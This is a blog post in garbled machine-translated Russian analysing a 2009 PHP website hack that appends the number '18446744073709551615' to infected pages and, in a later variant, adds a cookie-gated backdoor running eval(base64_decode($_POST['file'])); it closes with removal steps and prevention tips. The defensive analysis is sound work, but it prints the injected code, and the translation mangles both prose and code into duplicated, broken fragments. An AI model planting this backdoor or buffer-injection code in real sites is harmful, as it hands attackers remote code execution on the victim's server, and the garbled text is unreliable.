В последние дни я вижу, увеличение числа случаев взлома, которые явно злонамеренное действие для отображения в конце главной странице жертвы, число "18446744073709551615".

Поискав в сети, используя это число как поисковый ключ вы найдете множество статей / постов, которые говорят, что это максимальное число, используемое в рамках поля BIGINT в РНР. Это приведет ничего не подозревающих пользователей Go Crazy ищет функцию на вашем сайте, который выполняет вычисления, которые приводят к появлению этого числа. Все это будет бесполезно!

Собственно, это будет отображаться номер и страницы "index.php" страница вашего сайта была взломана, включив в него следующие функции, которая не изменяет поведение на этой странице отображается в нижней части номер страницы в этом вопросе.

Пересмотренный появится страница со следующим кодом:

  1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20

 ( "security_update" ) ; //do not remove this line - important security update! <--- CODICE ORIGINALE DELLA PAGINA ---> ?> < ?php function security_update ( $buffer ) { $update = '18446744073709551615' ; if ( stristr ( $buffer , '</html' ) !== FALSE ) { return eregi_replace ( '</html' , $update . '<html' , $buffer ) ; } else { return $buffer . $update ; } } ?> <? Php ob_start ( "security_update"), / / не удалить эту строку - важные обновления безопасности <--- КОД Original Page ---> <? Php функции security_update ($ буфера) ($ Update = ' 18446744073709551615 "Если (stristr ($ буфера, '</ HTML')! == FALSE) (возврат eregi_replace ( '</ HTML', $ обновления. '<HTML', $ буфера);) другое (возврат $ буфера. $ обновленная ;))?> 

Как вы можете увидеть код, анализируя "security_update" не ставится все результаты из веб-страницы в буфер, а затем добавить в буфер значения "18446744073709551615".

Возникает вопрос: почему?

Хотя я следя за эволюцией этой рубить пока не определили причину таких действий. Гипотеза, что в настоящее время представляется наиболее правдивой, и что вы используете его в качестве "маркера" Сайты "зараженных" так что вы можете легко найти в любом поиска по сети.

Итак, кто вносит эти хаки могут определить свои жертвы и объекты, для которых зная безопасности недостаток, который позволил вам писать, что на данный момент число "18446744073709551615".

Видя тенденцию последних недель наблюдался Эволюция сценария в том, что была добавлена новая линия, которые могли бы быть действительно наносят ущерб пострадавшим. Настоящего Кодекса, в его новой версии:

  1
 2
 3

  <? Php
 "security_update" ) ; //do not remove this line - important security update! ob_start ( "security_update") / / не удалить эту строку - важные обновления безопасности!
  md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> < ?php если (md5 ($ _COOKIE ['73043475c0893e30 ']) == "59fdd20854f4a2056c082cab53e64860") (EVAL (base64_decode ($ _POST [' файла'])); выход;) <? PHP 

Этот сценарий имеет более проверку Cookie, что, когда произошло ($ _COOKIE ['73043475c0893e30'])==" 59fdd20854f4a2056c082cab53e64860 "), выполняет декодирование зашифрованного файла по почте.

Таким образом, хакер имеет возможность отправлять файлы на всех доменах, которые ранее инфицированных и "бренда".

Для теперь, я не видел конкретных действий, которые воспользовались этой функцией "security_update ()", но, конечно, вполне естественно думать, что сценарий и его эволюция нескольких шагах от действий, направленных на повышение сотни зараженных сайтов для достижения дальнейшего Нападение массовой информации.

Как удалить?

Чтобы удалить только найти все страницы, показывающие число "18446744073709551615" и очистку код этого рубить показано выше.

Опять "PoweGrep" нас удобно позволяющий искать строку "18446744073709551615" по всем файлам на вашем сайте (местное).

Как только определили, страниц удаляются из этих линий в верхней части страницы:

  1
 2
 3

  <? Php
 "security_update" ) ; //do not remove this line - important security update! ob_start ( "security_update") / / не удалить эту строку - важные обновления безопасности!
 md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> если (md5 ($ _COOKIE ['73043475c0893e30 ']) == "59fdd20854f4a2056c082cab53e64860") (EVAL (base64_decode ($ _POST [' файла'])); выход;)?> 

(строка 3 не присутствует во всех версиях)

и эти регенерировать с конца:

  1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14

  <? Php
                 $buffer ) security_update функции ($ буфер)
                 (
                         '18446744073709551615' ; $ '18446744073709551615 Update = ';
                         stristr ( $buffer , '</html' ) !== FALSE ) если (stristr ($ буфера, '</ HTML')! == FALSE)
                         (
                                 ( '</html' , $update . '<html' , $buffer ) ; возвращение eregi_replace ( '</ HTML', $ обновления. '<HTML', $ Buffer);
                         )
                         еще
                         (
                                 . $update ; вернуть $ буфера. $ Update;
                         )
                 )
                 ?> 

Возможность заражения

Я решил, на данный момент, если заражение происходит через уязвимость в веб-приложение или же через FTP с использованием учетных данных клиентом FTP.

В обоих случаях советы всегда одинакова, и они всегда так делают:

1) сделать на безопасные объекты, такие как Secunia и о безопасности или Milw0rm любых новых уязвимостей в своих приложениях / скрипты / CMS.

2) осуществлять периодические полное сканирование своих компьютеров с программным обеспечением AntiMalware, AntiSpyware и т.д.. Особенно рекомендуется использовать Malwarebytes 'Anti-Malware которая включает в себя все эти меры защиты в рамках единого решения

Любой человек с информацией об этом и хотела бы поделиться им напишите мне на capn3m0@capn3m0.org

Update 8 / 11/2009: [Hack] - не можем переопределить security_update (), конец уже здесь!